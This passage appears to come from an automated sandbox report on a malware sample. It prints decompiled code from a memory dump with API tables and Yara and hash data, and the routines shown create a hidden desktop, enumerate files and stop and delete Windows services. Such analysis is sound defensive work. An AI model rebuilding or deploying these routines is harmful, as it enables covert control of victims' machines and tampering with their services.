                                                                                    					E04ED573F(_t115);
                                                                                    				}
                                                                                    				return E04ED572E(_v12 ^ _t116);
                                                                                    			}
                                                                                    0x04eb6590
                                                                                    0x04eb6599
                                                                                    0x04eb65a0
                                                                                    0x04eb65a3
                                                                                    0x04eb65ab
                                                                                    0x04eb65b3
                                                                                    0x04eb65b9
                                                                                    0x04eb65bc
                                                                                    0x04eb65c5
                                                                                    0x04eb65c8
                                                                                    0x04eb65ce
                                                                                    0x04eb65e1
                                                                                    0x04eb65e8
                                                                                    0x04eb65ef
                                                                                    0x04eb65f6
                                                                                    0x04eb6600
                                                                                    0x04eb6607
                                                                                    0x04eb660d
                                                                                    0x04eb6610
                                                                                    0x04eb6612
                                                                                    0x04eb6626
                                                                                    0x04eb6626
                                                                                    0x04eb662c
                                                                                    0x04eb6632
                                                                                    0x04eb663b
                                                                                    0x04eb6644
                                                                                    0x04eb664d
                                                                                    0x04eb6659
                                                                                    0x04eb666a
                                                                                    0x04eb6670
                                                                                    0x04eb6676
                                                                                    0x04eb6680
                                                                                    0x04eb6684
                                                                                    0x04eb668b
                                                                                    0x04eb669a
                                                                                    0x04eb669e
                                                                                    0x04eb66a2
                                                                                    0x04eb66a6
                                                                                    0x04eb66ab
                                                                                    0x04eb66b0
                                                                                    0x04eb66c0
                                                                                    0x04eb66c6
                                                                                    0x04eb66cd
                                                                                    0x04eb66d2
                                                                                    0x04eb66db
                                                                                    0x04eb66e2
                                                                                    0x04eb66e9
                                                                                    0x04eb66f0
                                                                                    0x04eb66f3
                                                                                    0x04eb66f4
                                                                                    0x04eb66ff
                                                                                    0x04eb6702
                                                                                    0x04eb670a
                                                                                    0x04eb6718
                                                                                    0x04eb6721
                                                                                    0x04eb6729
                                                                                    0x04eb6730
                                                                                    0x04eb6733
                                                                                    0x04eb6739
                                                                                    0x04eb673e
                                                                                    0x04eb6743
                                                                                    0x04eb674c
                                                                                    0x04eb674f
                                                                                    0x04eb6752
                                                                                    0x04eb6757
                                                                                    0x04eb6762
                                                                                    0x04eb676e
                                                                                    0x04eb6779
                                                                                    0x04eb6782
                                                                                    0x04eb6784
                                                                                    0x04eb678c
                                                                                    0x04eb6793
                                                                                    0x04eb6797
                                                                                    0x04eb679a
                                                                                    0x04eb679f
                                                                                    0x04eb67aa
                                                                                    0x04eb67ac
                                                                                    0x04eb67ae
                                                                                    0x04eb67af
                                                                                    0x04eb67b5
                                                                                    0x04eb67ba
                                                                                    0x04eb67cf

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EB65BF
                                                                                      • Part of subcall function 04EB6520: LoadLibraryA.KERNEL32(User32.dll,?,04EB65D3), ref: 04EB6526
                                                                                    • OpenDesktopW.USER32(default2,00000000,00000001,10000000), ref: 04EB6607
                                                                                    • CreateDesktopW.USER32 ref: 04EB6620
                                                                                    • SetThreadDesktop.USER32(?), ref: 04EB662C
                                                                                    • GetDesktopWindow.USER32 ref: 04EB6632
                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 04EB663B
                                                                                    • GetMonitorInfoW.USER32 ref: 04EB664D
                                                                                    • EnumDisplaySettingsW.USER32 ref: 04EB666A
                                                                                    • GetDC.USER32(00000000), ref: 04EB6729
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04EB6733
                                                                                    • GetVersionExA.KERNEL32(?), ref: 04EB6762
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Create$MonitorWindow$CompatibleDisplayEnumEventFromInfoLibraryLoadOpenSettingsThreadVersion
                                                                                    • String ID: default2$h
                                                                                    • API String ID: 1408810681-1613360701
                                                                                    • Opcode ID: dd6dfb2ee54577a8f5c02bb392ab79968e17f4eec564577992adc81b513d5600
                                                                                    • Instruction ID: 2b0fd80a7d1bef4a43c9abc2779f2018a18ebb723db8cadd2e6c9487b603acba
                                                                                    • Opcode Fuzzy Hash: dd6dfb2ee54577a8f5c02bb392ab79968e17f4eec564577992adc81b513d5600
                                                                                    • Instruction Fuzzy Hash: BE619DB0900A0ABFE711DF75DC49B9ABBB8FF44305F104229E9059B680EB74B965CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 42%
                                                                                    			E04EB53D0(void* __ebx, void* __ecx, void* __edi, WCHAR* _a4) {
                                                                                    				signed int _v12;
                                                                                    				signed int _v1056;
                                                                                    				short _v2096;
                                                                                    				intOrPtr _v2100;
                                                                                    				intOrPtr _v2104;
                                                                                    				char _v2120;
                                                                                    				struct _WIN32_FIND_DATAW _v2712;
                                                                                    				signed int _v2713;
                                                                                    				intOrPtr _v2720;
                                                                                    				void* _v2724;
                                                                                    				void* __ebp;
                                                                                    				signed int _t64;
                                                                                    				void* _t73;
                                                                                    				signed int _t74;
                                                                                    				signed int _t75;
                                                                                    				signed int _t77;
                                                                                    				signed int _t82;
                                                                                    				signed int _t89;
                                                                                    				signed int _t90;
                                                                                    				signed int _t94;
                                                                                    				intOrPtr _t99;
                                                                                    				intOrPtr _t105;
                                                                                    				intOrPtr* _t108;
                                                                                    				signed int _t109;
                                                                                    				void* _t116;
                                                                                    				intOrPtr* _t121;
                                                                                    				intOrPtr* _t128;
                                                                                    				void* _t131;
                                                                                    				signed int _t134;
                                                                                    				signed int _t138;
                                                                                    				signed int _t139;
                                                                                    				intOrPtr _t140;
                                                                                    				void* _t141;
                                                                                    				signed int _t142;
                                                                                    				signed int _t143;
                                                                                    				WCHAR* _t145;
                                                                                    				intOrPtr _t150;
                                                                                    				intOrPtr _t152;
                                                                                    				void* _t153;
                                                                                    				signed int _t156;
                                                                                    				void* _t158;
                                                                                    				void* _t160;
                                                                                    
                                                                                    				_t64 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t64 ^ _t156;
                                                                                    				_t145 = _a4;
                                                                                    				_t116 = __ecx;
                                                                                    				E04EDDAD0(_t145,  &_v2096, 0, 0x410);
                                                                                    				lstrlenW(_t145);
                                                                                    				_t150 =  !=  ? 0x4efc92c : 0x4efb5d0;
                                                                                    				_v2720 = 0x4efb5d0;
                                                                                    				wsprintfW( &_v2096, L"%s%s*.*", _t145, 0x4efb5d0);
                                                                                    				_t160 = _t158 + 0x1c;
                                                                                    				_t73 = FindFirstFileW( &_v2096,  &_v2712);
                                                                                    				_v2724 = _t73;
                                                                                    				if(_t73 != 0xffffffff) {
                                                                                    					_v2713 = 1;
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					do {
                                                                                    						_t121 = ".";
                                                                                    						_t74 =  &(_v2712.cFileName);
                                                                                    						while(1) {
                                                                                    							_t138 =  *_t74;
                                                                                    							__eflags = _t138 -  *_t121;
                                                                                    							if(_t138 !=  *_t121) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags = _t138;
                                                                                    							if(_t138 == 0) {
                                                                                    								L8:
                                                                                    								_t75 = 0;
                                                                                    							} else {
                                                                                    								_t143 =  *((intOrPtr*)(_t74 + 2));
                                                                                    								__eflags = _t143 -  *((intOrPtr*)(_t121 + 2));
                                                                                    								if(_t143 !=  *((intOrPtr*)(_t121 + 2))) {
                                                                                    									break;
                                                                                    								} else {
                                                                                    									_t74 = _t74 + 4;
                                                                                    									_t121 = _t121 + 4;
                                                                                    									__eflags = _t143;
                                                                                    									if(_t143 != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L8;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							L10:
                                                                                    							__eflags = _t75;
                                                                                    							if(_t75 == 0) {
                                                                                    								goto L29;
                                                                                    							} else {
                                                                                    								_t128 = L"..";
                                                                                    								_t89 =  &(_v2712.cFileName);
                                                                                    								while(1) {
                                                                                    									_t139 =  *_t89;
                                                                                    									__eflags = _t139 -  *_t128;
                                                                                    									if(_t139 !=  *_t128) {
                                                                                    										break;
                                                                                    									}
                                                                                    									__eflags = _t139;
                                                                                    									if(_t139 == 0) {
                                                                                    										L16:
                                                                                    										_t90 = 0;
                                                                                    									} else {
                                                                                    										_t142 =  *((intOrPtr*)(_t89 + 2));
                                                                                    										__eflags = _t142 -  *((intOrPtr*)(_t128 + 2));
                                                                                    										if(_t142 !=  *((intOrPtr*)(_t128 + 2))) {
                                                                                    											break;
                                                                                    										} else {
                                                                                    											_t89 = _t89 + 4;
                                                                                    											_t128 = _t128 + 4;
                                                                                    											__eflags = _t142;
                                                                                    											if(_t142 != 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												goto L16;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    									L18:
                                                                                    									__eflags = _t90;
                                                                                    									if(_t90 == 0) {
                                                                                    										goto L29;
                                                                                    									} else {
                                                                                    										__eflags = _v2712.dwFileAttributes & 0x00000010;
                                                                                    										_push( &(_v2712.cFileName));
                                                                                    										_push(_t150);
                                                                                    										_push(_t145);
                                                                                    										_v2713 = 0;
                                                                                    										_push(L"%s%s%s");
                                                                                    										_push( &_v1056);
                                                                                    										if((_v2712.dwFileAttributes & 0x00000010) == 0) {
                                                                                    											wsprintfW();
                                                                                    											_t94 = 0;
                                                                                    											_v2100 = 7;
                                                                                    											_t160 = _t160 + 0x14;
                                                                                    											_v2104 = 0;
                                                                                    											_v2120 = 0;
                                                                                    											__eflags = _v1056;
                                                                                    											if(_v1056 != 0) {
                                                                                    												_t108 =  &_v1056;
                                                                                    												_t141 = _t108 + 2;
                                                                                    												do {
                                                                                    													_t134 =  *_t108;
                                                                                    													_t108 = _t108 + 2;
                                                                                    													__eflags = _t134;
                                                                                    												} while (_t134 != 0);
                                                                                    												_t109 = _t108 - _t141;
                                                                                    												__eflags = _t109;
                                                                                    												_t94 = _t109 >> 1;
                                                                                    											}
                                                                                    											_push(_t94);
                                                                                    											E04EB32A0( &_v2120,  &_v1056);
                                                                                    											_t152 =  *((intOrPtr*)(_t116 + 0xc));
                                                                                    											_t140 = E04EB5CE0(_t152,  *((intOrPtr*)(_t152 + 4)),  &_v2120);
                                                                                    											_t99 =  *((intOrPtr*)(_t116 + 0x10));
                                                                                    											_t131 = 0x7fffffe - _t99;
                                                                                    											__eflags = _t131 - 1;
                                                                                    											if(__eflags < 0) {
                                                                                    												_push("list<T> too long");
                                                                                    												E04ED665F(__eflags);
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												_push(_t156);
                                                                                    												_push(_t131);
                                                                                    												_push(_t152);
                                                                                    												_t153 = _t131;
                                                                                    												__eflags =  *(_t153 + 0x10);
                                                                                    												if( *(_t153 + 0x10) != 0) {
                                                                                    													_t131 = _t153 + 0xc;
                                                                                    													E04EB59F0(_t131, _t140);
                                                                                    												}
                                                                                    												_push(_t131);
                                                                                    												_push(0x3f);
                                                                                    												_push(1);
                                                                                    												_push( &_v12);
                                                                                    												_v12 = 0x6c;
                                                                                    												return E04EB1C60( *((intOrPtr*)(_t153 + 4)));
                                                                                    											} else {
                                                                                    												 *((intOrPtr*)(_t116 + 0x10)) = _t99 + 1;
                                                                                    												 *((intOrPtr*)(_t152 + 4)) = _t140;
                                                                                    												 *((intOrPtr*)( *((intOrPtr*)(_t140 + 4)))) = _t140;
                                                                                    												_t105 = _v2100;
                                                                                    												__eflags = _t105 - 8;
                                                                                    												if(_t105 >= 8) {
                                                                                    													__eflags = _t105 + 1;
                                                                                    													E04EB3540(_t116, _t140, _t145, _v2120, _t105 + 1);
                                                                                    												}
                                                                                    												_t150 = _v2720;
                                                                                    												goto L29;
                                                                                    											}
                                                                                    										} else {
                                                                                    											wsprintfW();
                                                                                    											_t160 = _t160 + 0x14;
                                                                                    											E04EB53D0(_t116, _t116, _t145,  &_v1056);
                                                                                    											goto L29;
                                                                                    										}
                                                                                    									}
                                                                                    									goto L40;
                                                                                    								}
                                                                                    								asm("sbb eax, eax");
                                                                                    								_t90 = _t89 | 0x00000001;
                                                                                    								__eflags = _t90;
                                                                                    								goto L18;
                                                                                    							}
                                                                                    							goto L40;
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t75 = _t74 | 0x00000001;
                                                                                    						__eflags = _t75;
                                                                                    						goto L10;
                                                                                    						L29:
                                                                                    						_t77 = FindNextFileW(_v2724,  &_v2712);
                                                                                    						__eflags = _t77;
                                                                                    					} while (_t77 != 0);
                                                                                    					FindClose(_v2724);
                                                                                    					__eflags = _v2713;
                                                                                    					if(_v2713 != 0) {
                                                                                    						_t82 = lstrlenW(_t145);
                                                                                    						_push(_t145);
                                                                                    						__eflags =  *((short*)(_t145 + _t82 * 2 - 2)) - 0x5c;
                                                                                    						if( *((short*)(_t145 + _t82 * 2 - 2)) != 0x5c) {
                                                                                    							E04EB31B0( &_v2120, _t145);
                                                                                    							E04EB5AB0( &_v2120,  &_v2120, 1);
                                                                                    						} else {
                                                                                    							E04EB31B0( &_v2120, _t145);
                                                                                    						}
                                                                                    						_push( &_v2120);
                                                                                    						E04EB5A60(_t116 + 0xc, __eflags);
                                                                                    						E04EB3170( &_v2120);
                                                                                    					}
                                                                                    					__eflags = _v12 ^ _t156;
                                                                                    					return E04ED572E(_v12 ^ _t156);
                                                                                    				} else {
                                                                                    					return E04ED572E(_v12 ^ _t156);
                                                                                    				}
                                                                                    				L40:
                                                                                    			}
                                                                                    0x04eb56b5
                                                                                    0x04eb56bc
                                                                                    0x04eb56be
                                                                                    0x04eb56c0
                                                                                    0x04eb56c1
                                                                                    0x04eb56ce
                                                                                    0x04eb55ca
                                                                                    0x04eb55cd
                                                                                    0x04eb55d0
                                                                                    0x04eb55d6
                                                                                    0x04eb55d8
                                                                                    0x04eb55de
                                                                                    0x04eb55e1
                                                                                    0x04eb55e3
                                                                                    0x04eb55eb
                                                                                    0x04eb55eb
                                                                                    0x04eb55f0
                                                                                    0x00000000
                                                                                    0x04eb55f0
                                                                                    0x04eb5528
                                                                                    0x04eb5528
                                                                                    0x04eb552e
                                                                                    0x04eb553a
                                                                                    0x00000000
                                                                                    0x04eb553a
                                                                                    0x04eb5526
                                                                                    0x00000000
                                                                                    0x04eb54fd
                                                                                    0x04eb54f6
                                                                                    0x04eb54f8
                                                                                    0x04eb54f8
                                                                                    0x00000000
                                                                                    0x04eb54f8
                                                                                    0x00000000
                                                                                    0x04eb54bd
                                                                                    0x04eb54b6
                                                                                    0x04eb54b8
                                                                                    0x04eb54b8
                                                                                    0x00000000
                                                                                    0x04eb55f6
                                                                                    0x04eb5603
                                                                                    0x04eb5609
                                                                                    0x04eb5609
                                                                                    0x04eb5617
                                                                                    0x04eb5623
                                                                                    0x04eb5625
                                                                                    0x04eb5628
                                                                                    0x04eb562e
                                                                                    0x04eb5635
                                                                                    0x04eb563b
                                                                                    0x04eb5644
                                                                                    0x04eb5652
                                                                                    0x04eb563d
                                                                                    0x04eb563d
                                                                                    0x04eb563d
                                                                                    0x04eb565d
                                                                                    0x04eb5661
                                                                                    0x04eb566c
                                                                                    0x04eb566c
                                                                                    0x04eb5678
                                                                                    0x04eb5683
                                                                                    0x04eb5457
                                                                                    0x04eb5469
                                                                                    0x04eb5469
                                                                                    0x00000000

Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Similarity
• API ID: FileFindFirstlstrlenwsprintf
• String ID: %s%s%s$%s%s*.*$list<T> too long
• API String ID: 4287520746-3667615295
• Opcode ID: 60a5852c19c783973d12779d61b4bdcc13c44bac27998b712cd2afea5fdb4079
• Instruction ID: ac684e6c77b0a16840f55a1b5263cc55e01b3fc072bbe907397a25410aa8e732
• Opcode Fuzzy Hash: 60a5852c19c783973d12779d61b4bdcc13c44bac27998b712cd2afea5fdb4079
• Instruction Fuzzy Hash: C261C370A00219AFDB21DF24CC45BEBB7B8FF45318F4491D5D989A7240EB31AA84CFA1
• Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 45%
                                                                                    			E04EB3C30(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v14;
                                                                                    				intOrPtr _v18;
                                                                                    				intOrPtr _v22;
                                                                                    				intOrPtr _v26;
                                                                                    				intOrPtr _v30;
                                                                                    				intOrPtr _v34;
                                                                                    				intOrPtr _v38;
                                                                                    				intOrPtr _v42;
                                                                                    				char _v44;
                                                                                    				intOrPtr _v48;
                                                                                    				unsigned int _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				long _v72;
                                                                                    				signed int _t84;
                                                                                    				long _t103;
                                                                                    				unsigned int _t107;
                                                                                    				intOrPtr _t117;
                                                                                    				signed int _t119;
                                                                                    				intOrPtr _t135;
                                                                                    				signed int _t137;
                                                                                    				void* _t146;
                                                                                    				intOrPtr _t152;
                                                                                    				long _t154;
                                                                                    				signed int _t155;
                                                                                    				signed int _t156;
                                                                                    				intOrPtr _t157;
                                                                                    				char* _t159;
                                                                                    				signed int _t160;
                                                                                    
                                                                                    				_t84 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t84 ^ _t160;
                                                                                    				_t159 = _a4;
                                                                                    				_v72 = GetTickCount();
                                                                                    				_t154 = GetTickCount();
                                                                                    				_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                                                    				_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                    				_v64 =  *((intOrPtr*)(_t159 + 0x18));
                                                                                    				_v68 =  *((intOrPtr*)(_t159 + 0x1c));
                                                                                    				_v44 = 0x267;
                                                                                    				while( *((char*)(_t159 + 1)) != 0) {
                                                                                    					_t103 = GetTickCount();
                                                                                    					_t142 = _t103 - _t154;
                                                                                    					_t107 = 0x10624dd3 * (_t103 - _t154) >> 0x20 >> 6;
                                                                                    					_v52 = _t107;
                                                                                    					if(_t107 >= 5) {
                                                                                    						_t154 = GetTickCount();
                                                                                    						_v48 = _t154;
                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 8)) != 0) {
                                                                                    							_t152 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                    							_t157 =  *((intOrPtr*)(_t159 + 0x18));
                                                                                    							_t135 =  *((intOrPtr*)(_t159 + 0x1c));
                                                                                    							_v42 =  *((intOrPtr*)(_t159 + 0x10));
                                                                                    							_v38 = _t152;
                                                                                    							asm("sbb edx, [ebp-0x38]");
                                                                                    							_v34 = _t157;
                                                                                    							_v30 = _t135;
                                                                                    							_v26 = E04EF1760( *((intOrPtr*)(_t159 + 0x10)) - _v56, _t152, _v52, 0);
                                                                                    							_t146 = _t157 - _v64;
                                                                                    							_v22 = _t152;
                                                                                    							asm("sbb eax, [ebp-0x40]");
                                                                                    							_v18 = E04EF1760(_t146, _t135, _v52, 0);
                                                                                    							_push(_t146);
                                                                                    							_t142 =  *(_t159 + 8);
                                                                                    							_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                                                    							_push(0x3f);
                                                                                    							_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                    							_push(0x22);
                                                                                    							_push( &_v44);
                                                                                    							_v14 = _t152;
                                                                                    							_v64 = _t157;
                                                                                    							_v68 = _t135;
                                                                                    							E04EB1C60( *(_t159 + 8));
                                                                                    							_t154 = _v48;
                                                                                    						}
                                                                                    						_t117 =  *((intOrPtr*)(_t159 + 4));
                                                                                    						if( *((short*)(_t117 + 0x16)) == 2) {
                                                                                    							_t156 = 0;
                                                                                    							if( *((intOrPtr*)(_t117 + 0x1c)) > 0) {
                                                                                    								do {
                                                                                    									_t119 = E04EDEB76(_t142) & 0x800000ff;
                                                                                    									if(_t119 < 0) {
                                                                                    										_t119 = (_t119 - 0x00000001 | 0xffffff00) + 1;
                                                                                    									}
                                                                                    									_t142 =  *( *((intOrPtr*)(_t159 + 4)) + 0x3c);
                                                                                    									 *(_t156 +  *( *((intOrPtr*)(_t159 + 4)) + 0x3c)) = _t119;
                                                                                    									_t156 = _t156 + 1;
                                                                                    								} while (_t156 <  *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 0x1c)));
                                                                                    							}
                                                                                    							_t154 = _v48;
                                                                                    						}
                                                                                    					}
                                                                                    					Sleep(0x64);
                                                                                    					_t137 = GetTickCount() - _v72;
                                                                                    					if(0x88888889 * (0x10624dd3 * _t137 >> 0x20 >> 6) >> 0x20 >> 5 >= ( *( *((intOrPtr*)(_t159 + 4)) + 0x14) & 0x0000ffff)) {
                                                                                    						 *((char*)(_t159 + 1)) = 0;
                                                                                    					}
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t159 + 0x38)) != 0) {
                                                                                    					_t137 = 0;
                                                                                    					_t155 = 0;
                                                                                    					if(0 <  *( *((intOrPtr*)(_t159 + 4)) + 0x12)) {
                                                                                    						do {
                                                                                    							WaitForSingleObject( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4), 0xffffffff);
                                                                                    							CloseHandle( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4));
                                                                                    							_t155 = _t155 + 1;
                                                                                    						} while (_t155 < ( *( *((intOrPtr*)(_t159 + 4)) + 0x12) & 0x0000ffff));
                                                                                    					}
                                                                                    					 *_t159 = 1;
                                                                                    				}
                                                                                    				_push(_t137);
                                                                                    				_push(0x3f);
                                                                                    				_push(2);
                                                                                    				_v44 = 0x67;
                                                                                    				E04EB1C60( *(_t159 + 8));
                                                                                    				return E04ED572E(_v8 ^ _t160,  &_v44);
                                                                                    			}

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$__aulldiv$CloseHandleObjectSingleSleepWait
                                                                                    • String ID: g
                                                                                    • API String ID: 227884459-30677878
                                                                                    • Opcode ID: 0b55696e8f3690d3d28b6e9dc44e89eddf3c1967469998a5eb69adfbff574f77
                                                                                    • Instruction ID: 9c0114d3fc95ef66bef7e7e62f47a746050466dafc939a8027a9c61533315d39
                                                                                    • Opcode Fuzzy Hash: 0b55696e8f3690d3d28b6e9dc44e89eddf3c1967469998a5eb69adfbff574f77
                                                                                    • Instruction Fuzzy Hash: 6F512871A006089FCB24DFA9D985AAEFBF6FF48310F409519E896E7651D730F845CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC3A20(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                                                    				// __ecx: service name (wide string). The routine asks the named service to stop,
                                                                                    				// waits for it to reach SERVICE_STOPPED, then deletes it and its HKLM registry key.
                                                                                    				signed int _v8;
                                                                                    				short _v2056;
                                                                                    				intOrPtr _v2080;
                                                                                    				struct _SERVICE_STATUS _v2084;
                                                                                    				short* _v2088;
                                                                                    				void* _v2092;
                                                                                    				signed int _t13;
                                                                                    				void* _t15;
                                                                                    				void* _t38;
                                                                                    				short* _t41;
                                                                                    				void* _t42;
                                                                                    				signed int _t43;
                                                                                    
                                                                                    				_t13 =  *0x4f03008; // 0x3d21fb31 (stack cookie)
                                                                                    				_v8 = _t13 ^ _t43;
                                                                                    				_t41 = __ecx;
                                                                                    				_v2088 = __ecx;
                                                                                    				_t15 = OpenSCManagerW(0, 0, 0xf003f); // 0xf003f = SC_MANAGER_ALL_ACCESS
                                                                                    				_v2092 = _t15;
                                                                                    				if(_t15 == 0) {
                                                                                    					L12:
                                                                                    					return E04ED572E(_v8 ^ _t43); // stack-cookie check (compiler-inserted helper)
                                                                                    				}
                                                                                    				_t38 = OpenServiceW(_t15, _t41, 0xf01ff); // 0xf01ff = SERVICE_ALL_ACCESS
                                                                                    				if(_t38 == 0) {
                                                                                    					L11:
                                                                                    					CloseServiceHandle(_v2092);
                                                                                    					goto L12;
                                                                                    				}
                                                                                    				_t42 = 0; // elapsed wait time in milliseconds
                                                                                    				do {
                                                                                    					if(QueryServiceStatus(_t38,  &_v2084) == 0) {
                                                                                    						goto L6;
                                                                                    					}
                                                                                    					if(_v2080 == 1) { // _v2084.dwCurrentState == SERVICE_STOPPED
                                                                                    						if(DeleteService(_t38) != 0) {
                                                                                    							E04EDDAD0(_t38,  &_v2056, 0, 0x800); // zero the 0x800-byte key-path buffer (memset-like helper)
                                                                                    							wsprintfW( &_v2056, L"SYSTEM\\CurrentControlSet\\Services\\%s", _v2088);
                                                                                    							SHDeleteKeyW(0x80000002,  &_v2056); // 0x80000002 = HKEY_LOCAL_MACHINE
                                                                                    						}
                                                                                    						L10:
                                                                                    						CloseServiceHandle(_t38);
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					ControlService(_t38, 1,  &_v2084); // 1 = SERVICE_CONTROL_STOP
                                                                                    					Sleep(0x1f4); // 500 ms
                                                                                    					L6:
                                                                                    					_t42 = _t42 + 0x1f4;
                                                                                    				} while (_t42 < 0x1388); // give up after 5000 ms without the service stopping
                                                                                    				goto L10;
                                                                                    			}

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC3A46
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04EC3A62
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04EC3A7C
                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04EC3A99
                                                                                    • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04EC3AA4
                                                                                    • DeleteService.ADVAPI32(00000000,?,000F01FF), ref: 04EC3ABB
                                                                                    • wsprintfW.USER32 ref: 04EC3AEA
                                                                                    • SHDeleteKeyW.SHLWAPI(80000002,?), ref: 04EC3AFF
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04EC3B0B
                                                                                    • CloseServiceHandle.ADVAPI32(?,?,000F01FF), ref: 04EC3B17
                                                                                    Strings
                                                                                    • SYSTEM\CurrentControlSet\Services\%s, xrefs: 04EC3AE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
                                                                                    • String ID: SYSTEM\CurrentControlSet\Services\%s
                                                                                    • API String ID: 3594024867-2757632955
                                                                                    • Opcode ID: 1139fce738fe2c27d54128bc77afd8c5439dedc3e0d3fd4cd391440be45f83ff
                                                                                    • Instruction ID: e20d171badddc05f1da510ea2703c7f31b010cae7537a218197b383c7d676e7f
                                                                                    • Opcode Fuzzy Hash: 1139fce738fe2c27d54128bc77afd8c5439dedc3e0d3fd4cd391440be45f83ff
                                                                                    • Instruction Fuzzy Hash: 2521B571A00218ABDB209B65DD48FBAB7BCFB44705F0090AAFD49E2144DE359E45CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 49%
                                                                                    			E04EBC990(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				signed int _v8;
                                                                                    				short _v12;
                                                                                    				char _v16;
                                                                                    				char _v18;
                                                                                    				short _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v28;
                                                                                    				signed int _v32;
                                                                                    				short _v36;
                                                                                    				char _v40;
                                                                                    				intOrPtr _v304;
                                                                                    				signed int _v308;
                                                                                    				intOrPtr _v312;
                                                                                    				char _v316;
                                                                                    				intOrPtr _v320;
                                                                                    				signed int _v324;
                                                                                    				signed int _t97;
                                                                                    				intOrPtr _t99;
                                                                                    				_Unknown_base(*)()* _t104;
                                                                                    				void* _t109;
                                                                                    				intOrPtr _t110;
                                                                                    				signed int _t111;
                                                                                    				void* _t112;
                                                                                    				void* _t117;
                                                                                    				void* _t123;
                                                                                    				void* _t128;
                                                                                    				void* _t131;
                                                                                    				void* _t135;
                                                                                    				void* _t138;
                                                                                    				void* _t141;
                                                                                    				signed int _t146;
                                                                                    				intOrPtr _t150;
                                                                                    				signed int _t156;
                                                                                    				signed int _t157;
                                                                                    				void* _t158;
                                                                                    				void* _t163;
                                                                                    				void* _t169;
                                                                                    				void* _t173;
                                                                                    				void* _t174;
                                                                                    				signed int _t177;
                                                                                    				void* _t178;
                                                                                    				void* _t179;
                                                                                    				intOrPtr* _t183;
                                                                                    				signed int _t184;
                                                                                    				signed int _t186;
                                                                                    				void* _t187;
                                                                                    				void* _t189;
                                                                                    				void* _t191;
                                                                                    				void* _t194;
                                                                                    				signed int _t197;
                                                                                    				void* _t198;
                                                                                    				char* _t200;
                                                                                    				void* _t202;
                                                                                    				struct HINSTANCE__* _t204;
                                                                                    				void* _t206;
                                                                                    				signed int _t207;
                                                                                    				signed int _t208;
                                                                                    				void* _t210;
                                                                                    				signed int _t212;
                                                                                    				void* _t215;
                                                                                    				void* _t217;
                                                                                    				void* _t218;
                                                                                    				void* _t220;
                                                                                    				signed int _t224;
                                                                                    
                                                                                    				_t187 = __edi;
                                                                                    				_t141 = __ebx;
